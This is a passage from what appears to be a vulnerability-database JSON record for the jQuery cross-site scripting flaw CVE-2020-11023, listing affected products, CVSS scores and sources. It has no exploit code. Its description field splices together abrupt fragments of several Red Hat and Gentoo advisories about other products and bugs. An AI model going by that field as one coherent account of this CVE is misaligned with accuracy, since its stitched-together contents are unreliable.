{
"_id": null,
"model": "log correlation engine",
"scope": "lt",
"trust": 1.0,
"vendor": "tenable",
"version": "6.0.9"
},
{
"_id": null,
"model": "financial services regulatory reporting for de nederlandsche bank",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18c"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.2"
},
{
"_id": null,
"model": "business intelligence",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.9.0.0.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.3.1"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4"
},
{
"_id": null,
"model": "health sciences inform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.3.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.3.2"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0"
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snap creator framework",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "storagetek tape analytics sw tool",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.3.1"
},
{
"_id": null,
"model": "communications services gatekeeper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "snapcenter server",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.8.6"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.1"
},
{
"_id": null,
"model": "banking enterprise collections",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.0"
},
{
"_id": null,
"model": "max data",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.9"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "31"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "application express",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "20.2"
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.4"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "171211"
},
{
"db": "PACKETSTORM",
"id": "170821"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170817"
},
{
"db": "PACKETSTORM",
"id": "168304"
},
{
"db": "PACKETSTORM",
"id": "159513"
},
{
"db": "PACKETSTORM",
"id": "158797"
}
],
"trust": 0.9
},
"cve": "CVE-2020-11023",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11023",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-163560",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11023",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2020-11023",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11023",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2020-11023",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-163560",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"description": {
"_id": null,
"data": "In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing \u003coption\u003e elements from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions 1.0.3 through 3.5.0. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1376706 - restore SerialNumber tag in caManualRenewal xml\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1406505 - KRA ECC installation failed with shared tomcat\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1666907 - CC: Enable AIA OCSP cert checking for entire cert chain\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page\n1710171 - CVE-2019-10146 pki-core: Reflected XSS in \u0027path length\u0027 constraint field in CA\u0027s Agent page\n1721684 - Rebase pki-servlet-engine to 9.0.30\n1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 
\n1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp\n1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server\n1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI\n1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak\n1824939 - JSS: add RSA PSS support - RHEL 8.3\n1824948 - add RSA PSS support - RHEL 8.3\n1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab [rhel-8]\n1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in \u0027path length\u0027 constraint field in CA\u0027s Agent page [rhel-8]\n1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password\n1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired=\"true\" but no secret\n1850004 - CVE-2020-11023 jquery: Passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException\n1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing\n1855273 - CVE-2020-15720 pki: Dogtag\u0027s python client does not validate certificates\n1855319 - Not able to launch pkiconsole\n1856368 - kra-key-generate request is failing\n1857933 - CA Installation is failing with ncipher v12.30 HSM\n1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request\n1869893 - Common certificates are missing in CS.cfg on shared PKI instance\n1871064 - replica install failing during pki-ca component configuration\n1873235 - pki 
ca-user-cert-add with secure port failed with \u0027SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT\u0027\n\n6. Description:\n\nRed Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Description:\n\nRed Hat JBoss Enterprise Application Platform 7 is a platform for Java\napplications based on the WildFly application runtime. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 
1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update\nAdvisory ID: RHSA-2022:6393-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:6393\nIssue date: 2022-09-08\nCVE Names: CVE-2020-11022 CVE-2020-11023 CVE-2021-22096\n CVE-2021-23358 CVE-2022-2806 CVE-2022-31129\n====================================================================\n1. Summary:\n\nUpdated ovirt-engine packages that fix several bugs and add various\nenhancements are now available. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch\n\n3. Description:\n\nThe ovirt-engine package provides the Red Hat Virtualization Manager, a\ncentralized management platform that allows system administrators to view\nand manage virtual machines. The Manager provides a comprehensive range of\nfeatures including search capabilities, resource management, live\nmigrations, and virtual infrastructure provisioning. 
\n\nSecurity Fix(es):\n\n* nodejs-underscore: Arbitrary code execution via the template function\n(CVE-2021-23358)\n\n* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jquery: Untrusted code execution via \u003coption\u003e tag in HTML passed to DOM\nmanipulation methods (CVE-2020-11023)\n\n* ovirt-log-collector: RHVM admin password is logged unfiltered\n(CVE-2022-2806)\n\n* springframework: malicious input leads to insertion of additional log\nentries (CVE-2021-22096)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Previously, running engine-setup did not always renew OVN certificates\nclose to expiration or expired. With this release, OVN certificates are\nalways renewed by engine-setup when needed. (BZ#2097558)\n\n* Previously, the Manager issued warnings of approaching certificate\nexpiration before engine-setup could update certificates. In this release\nexpiration warnings and certificate update periods are aligned, and\ncertificates are updated as soon as expiration warnings occur. (BZ#2097725)\n\n* With this release, OVA export or import work on hosts with a non-standard\nSSH port. (BZ#2104939)\n\n* With this release, the certificate validity test is compatible with RHEL\n8 and RHEL 7 based hypervisors. (BZ#2107250)\n\n* RHV 4.4 SP1 and later are only supported on RHEL 8.6, customers cannot\nuse RHEL 8.7 or later, and must stay with RHEL 8.6 EUS. (BZ#2108985)\n\n* Previously, importing templates from the Administration Portal did not\nwork. With this release, importing templates from the Administration Portal\nis possible. (BZ#2109923)\n\n* ovirt-provider-ovn certificate expiration is checked along with other RHV\ncertificates. 
If ovirt-provider-ovn is about to expire or already expired,\na warning or alert is raised in the audit log. To renew the\novirt-provider-ovn certificate, administators must run engine-setup. If\nyour ovirt-provider-ovn certificate expires on a previous RHV version,\nupgrade to RHV 4.4 SP1 batch 2 or later, and ovirt-provider-ovn certificate\nwill be renewed automatically in the engine-setup. (BZ#2097560)\n\n* Previously, when importing a virtual machine with manual CPU pinning, the\nmanual pinning string was cleared, but the CPU pinning policy was not set\nto NONE. As a result, importing failed. In this release, the CPU pinning\npolicy is set to NONE if the CPU pinning string is cleared, and importing\nsucceeds. (BZ#2104115)\n\n* Previously, the Manager could start a virtual machine with a Resize and\nPin NUMA policy on a host without an equal number of physical sockets to\nNUMA nodes. As a result, wrong pinning was assigned to the policy. With\nthis release, the Manager does not allow the virtual machine to be\nscheduled on such a virtual machine, and the pinning is correct based on\nthe algorithm. (BZ#1955388)\n\n* Rebase package(s) to version: 4.4.7. \nHighlights, important fixes, or notable enhancements: fixed BZ#2081676\n(BZ#2104831)\n\n* In this release, rhv-log-collector-analyzer provides detailed output for\neach problematic image, including disk names, associated virtual machine,\nthe host running the virtual machine, snapshots, and current SPM. The\ndetailed view is now the default. The compact option can be set by using\nthe --compact switch in the command line. (BZ#2097536)\n\n* UnboundID LDAP SDK has been rebased on upstream version 6.0.4. See\nhttps://github.com/pingidentity/ldapsdk/releases for changes since version\n4.0.14 (BZ#2092478)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. 
\n1944286 - CVE-2021-23358 nodejs-underscore: Arbitrary code execution via the template function\n1955388 - Auto Pinning Policy only pins some of the vCPUs on a single NUMA host\n1974974 - Not possible to determine migration policy from the API, even though documentation reports that it can be done. \n2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries\n2080005 - CVE-2022-2806 ovirt-log-collector: RHVM admin password is logged unfiltered\n2092478 - Upgrade unboundid-ldapsdk to 6.0.4\n2094577 - rhv-image-discrepancies must ignore small disks created by OCP\n2097536 - [RFE] Add disk name and uuid to problems output\n2097558 - Renew ovirt-provider-ovn.cer certificates during engine-setup\n2097560 - Warning when ovsdb-server certificates are about to expire(OVN certificate)\n2097725 - Certificate Warn period and automatic renewal via engine-setup do not match\n2104115 - RHV 4.5 cannot import VMs with cpu pinning\n2104831 - Upgrade ovirt-log-collector to 4.4.7\n2104939 - Export OVA when using host with port other than 22\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2107250 - Upgrade of the host failed as the RHV 4.3 hypervisor is based on RHEL 7 with openssl 1.0.z, but RHV Manager 4.4 uses the openssl 1.1.z syntax\n2107267 - ovirt-log-collector doesn\u0027t generate database dump\n2108985 - RHV 4.4 SP1 EUS requires RHEL 8.6 EUS (RHEL 8.7+ releases are not supported on RHV 4.4 SP1 EUS)\n2109923 - Error when importing templates in Admin portal\n\n6. 
Package List:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:\n\nSource:\novirt-engine-4.5.2.4-0.1.el8ev.src.rpm\novirt-engine-dwh-4.5.4-1.el8ev.src.rpm\novirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.src.rpm\novirt-engine-ui-extensions-1.3.5-1.el8ev.src.rpm\novirt-log-collector-4.4.7-2.el8ev.src.rpm\novirt-web-ui-1.9.1-1.el8ev.src.rpm\nrhv-log-collector-analyzer-1.0.15-1.el8ev.src.rpm\nunboundid-ldapsdk-6.0.4-1.el8ev.src.rpm\nvdsm-jsonrpc-java-1.7.2-1.el8ev.src.rpm\n\nnoarch:\novirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-backend-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-dbscripts-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-dwh-4.5.4-1.el8ev.noarch.rpm\novirt-engine-dwh-grafana-integration-setup-4.5.4-1.el8ev.noarch.rpm\novirt-engine-dwh-setup-4.5.4-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-setup-1.4.6-1.el8ev.noarch.rpm\novirt-engine-health-check-bundler-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-restapi-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-base-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-cinderlib-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-imageio-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-common-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-setup-plugin-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-tools-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-tools-backup-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-ui-extensions-1.3.5-1.el8ev.noarch.rpm\novirt-engine-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-webadmin-portal-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-engine-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm\novirt-log-collector-4.4.7-2.el8ev.noarch.rpm\novirt-web-ui-1.9.1-1.el8ev.noarch.rpm\npython3
-ovirt-engine-lib-4.5.2.4-0.1.el8ev.noarch.rpm\nrhv-log-collector-analyzer-1.0.15-1.el8ev.noarch.rpm\nrhvm-4.5.2.4-0.1.el8ev.noarch.rpm\nunboundid-ldapsdk-6.0.4-1.el8ev.noarch.rpm\nunboundid-ldapsdk-javadoc-6.0.4-1.el8ev.noarch.rpm\nvdsm-jsonrpc-java-1.7.2-1.el8ev.noarch.rpm\nvdsm-jsonrpc-java-javadoc-1.7.2-1.el8ev.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/cve/CVE-2021-22096\nhttps://access.redhat.com/security/cve/CVE-2021-23358\nhttps://access.redhat.com/security/cve/CVE-2022-2806\nhttps://access.redhat.com/security/cve/CVE-2022-31129\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYxnqRtzjgjWX9erEAQiQOw//XOS172gkbNeuoMSW1IYiEpJG4zQIvT2J\nVvyizOMlQzpe49Bkopu1zj/e8yM1eXNIg1elPzA3280z7ruNb4fkeoXT7vM5mB/0\njRAr1ja9ZHnZmEW60X3WVhEBjEXCeOv5CWBgqzdQWSB7RpPqfMP7/4kHGFnCPZxu\nV/n+Z9YKoDxeiW19tuTdU5E5cFySVV8JZAlfXlrR1dz815Ugsm2AMk6uPwjQ2+C7\nUz3zLQLjRjxFk+qSph8NYbOZGnUkypWQG5KXPMyk/Cg3jewjMkjAhzgcTJAdolRC\nq3p9kD5KdWRe+3xzjy6B4IsSSqvEyHphwrRv8wgk0vIAawfgi76+jL7n/C07rdpA\nQg6zlDxmHDrZPC42dsW6dXJ1QefRQE5EzFFJcoycqvWdlRfXX6D1RZc5knSQb2iI\n3iSh+hVwxY9pzNZVMlwtDHhw8dqvgw7JimToy8vOldgK0MdndwtVmKsKsRzu7HyL\nPQSvcN5lSv1X5FR2tnx9LMQXX1qn0P1d/8gTiRFm8Oabjx2r8I0/HNgnJpTSVSBO\nDXjKFDmwpiT+6tupM39ZbWek2hh+PoyMZJb/d6/YTND6VNlzUypq+DFtLILEaM8Z\nOjWz0YAL8/ihvhq0vSdFSMFcYKSWAOXA+6pSqe7N7WtB9hl0r7sLUaRSRHti1Ime\nuF/GLDTKkPw=8zTJ\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202007-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/ \u003chttps://security.gentoo.org/\u003e\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Cacti: Multiple vulnerabilities\n Date: July 26, 2020\n Bugs: #728678, #732522\n ID: 202007-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Cacti, the worst of which\ncould result in the arbitrary execution of code. \n\nBackground\n==========\n\nCacti is a complete frontend to rrdtool. 
\n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-analyzer/cacti \u003c 1.2.13 \u003e= 1.2.13\n 2 net-analyzer/cacti-spine\n \u003c 1.2.13 \u003e= 1.2.13\n -------------------------------------------------------------------\n 2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Cacti. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Cacti users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/cacti-1.2.13\"\n\nAll Cacti Spine users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=net-analyzer/cacti-spine-1.2.13\"\n\nReferences\n==========\n\n[ 1 ] CVE-2020-11022\n https://nvd.nist.gov/vuln/detail/CVE-2020-11022 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11022\u003e\n[ 2 ] CVE-2020-11023\n https://nvd.nist.gov/vuln/detail/CVE-2020-11023 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11023\u003e\n[ 3 ] CVE-2020-14295\n https://nvd.nist.gov/vuln/detail/CVE-2020-14295 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-14295\u003e\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202007-03 \u003chttps://security.gentoo.org/glsa/202007-03\u003e\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. 
Any security concerns should be addressed to\nsecurity@gentoo.org \u003cmailto:security@gentoo.org\u003e or alternatively, you may file a bug at\nhttps://bugs.gentoo.org \u003chttps://bugs.gentoo.org/\u003e. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5 \u003chttps://creativecommons.org/licenses/by-sa/2.5\u003e\n\n. Relevant releases/architectures:\n\n6ComputeNode-RH6-A-MQ-Interconnect-1 - noarch, x86_64\n6Server-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64\n6Workstation-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64\n7ComputeNode-RH7-A-MQ-Interconnect-1 - noarch, x86_64\n7Server-RH7-A-MQ-Interconnect-1 - noarch, x86_64\n7Workstation-RH7-A-MQ-Interconnect-1 - noarch, x86_64\n8Base-A-MQ-Interconnect-1 - noarch, x86_64\n\n3. AMQ\nInterconnect provides flexible routing of messages between AMQP-enabled\nendpoints, whether they are clients, servers, brokers, or any other entity\nthat can send or receive standard AMQP messages. For further information, refer to the release notes linked\nto in the References section. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQIC-2448 - Allow specifying address/source/target to be used for a multitenant listener\nENTMQIC-2455 - Allow AMQP open 